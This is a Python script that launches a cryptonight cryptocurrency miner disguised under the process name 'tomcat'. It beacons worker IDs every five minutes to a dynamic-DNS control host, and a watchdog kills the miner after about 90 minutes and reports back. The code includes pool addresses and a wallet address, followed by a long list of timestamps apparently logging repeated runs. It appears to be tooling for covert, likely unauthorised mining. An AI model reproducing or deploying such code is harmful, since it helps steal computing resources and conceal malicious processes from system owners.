import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:07:03.919554
#2018-02-17 16:55:03.770902
#2018-02-17 18:44:01.251250
#2018-02-17 20:34:06.452475
#2018-02-17 22:20:04.386163
#2018-02-18 00:04:05.487824
#2018-02-18 01:55:05.749601
#2018-02-18 03:43:04.134903
#2018-02-18 05:30:01.876348
#2018-02-18 07:22:03.715948
#2018-02-18 09:10:03.804827
#2018-02-18 10:56:04.294409
#2018-02-18 12:43:03.994212
#2018-02-18 14:29:07.249209
#2018-02-18 16:19:05.808615
#2018-02-18 18:09:05.013217
#2018-02-18 19:55:04.840184
#2018-02-18 21:42:05.671424
#2018-02-18 23:31:06.160832
#2018-02-19 01:17:03.899903
#2018-02-19 03:04:03.587567
#2018-02-19 04:50:07.652343
#2018-02-19 06:34:07.365368
#2018-02-19 08:23:04.878773
#2018-02-19 10:13:01.950822
#2018-02-19 12:00:12.524197
#2018-02-19 13:48:09.140251
#2018-02-19 15:36:05.416840
#2018-02-19 17:24:08.212240
#2018-02-19 19:13:01.565065
#2018-02-19 20:59:01.801475
#2018-02-19 22:46:07.816952
#2018-02-20 00:31:02.087626
#2018-02-20 02:18:07.081617
#2018-02-20 04:10:08.379618
#2018-02-20 05:53:03.553995
#2018-02-20 07:39:04.139536
#2018-02-20 09:23:05.799392
#2018-02-20 11:07:05.314216
#2018-02-20 12:53:01.775688
#2018-02-20 14:37:05.637388
#2018-02-20 16:21:08.247376
#2018-02-20 18:09:01.336821
#2018-02-20 19:59:03.618876
#2018-02-20 21:47:05.775965
#2018-02-20 23:28:03.137847
#2018-02-21 01:12:06.522041
#2018-02-21 02:58:08.058744
#2018-02-21 04:46:04.326318
#2018-02-21 06:37:08.910124
#2018-02-21 08:23:06.552509
#2018-02-21 10:08:07.474210
#2018-02-21 11:57:04.225501
#2018-02-21 13:47:01.855912
#2018-02-21 15:33:05.587874
#2018-02-21 17:23:09.508925
#2018-02-21 19:12:09.194799
#2018-02-21 21:01:04.761012
#2018-02-21 22:47:08.245119
#2018-02-22 00:35:08.274417
#2018-02-22 02:22:06.551170
#2018-02-22 04:09:04.132339
#2018-02-22 05:53:05.980081
#2018-02-22 07:39:05.447748
#2018-02-22 09:28:01.468876
#2018-02-22 11:13:08.180390
#2018-02-22 12:59:04.826185
#2018-02-22 14:48:01.829352
#2018-02-22 16:33:08.866829
#2018-02-22 18:18:07.097537
#2018-02-22 20:11:06.376115
#2018-02-22 21:58:05.305576
#2018-02-22 23:45:07.748803
#2018-02-23 01:33:06.590308
#2018-02-23 03:21:05.864437
#2018-02-23 05:07:06.260009
#2018-02-23 06:53:04.430541
#2018-02-23 08:35:04.458523
#2018-02-23 10:49:05.936945
#2018-02-23 12:47:06.466896
#2018-02-23 14:32:06.026089
#2018-02-23 16:22:02.150545
#2018-02-23 18:09:02.120303
#2018-02-23 19:54:01.348113
#2018-02-23 21:37:06.208460
#2018-02-23 23:26:05.493018
#2018-02-24 01:18:05.098827
#2018-02-24 03:11:04.444254
#2018-02-24 04:56:05.922705
#2018-02-24 06:40:03.937521
#2018-02-24 08:29:05.165477
#2018-02-24 10:16:06.924606
#2018-02-24 12:11:05.761530
#2018-02-24 13:57:06.072117
#2018-02-24 15:48:06.110560
#2018-02-24 17:43:03.992655
#2018-02-24 19:27:07.929552
#2018-02-24 21:18:04.378620
#2018-02-25 01:21:04.491071
#2018-02-25 05:30:05.075077
#2018-02-25 11:35:08.130648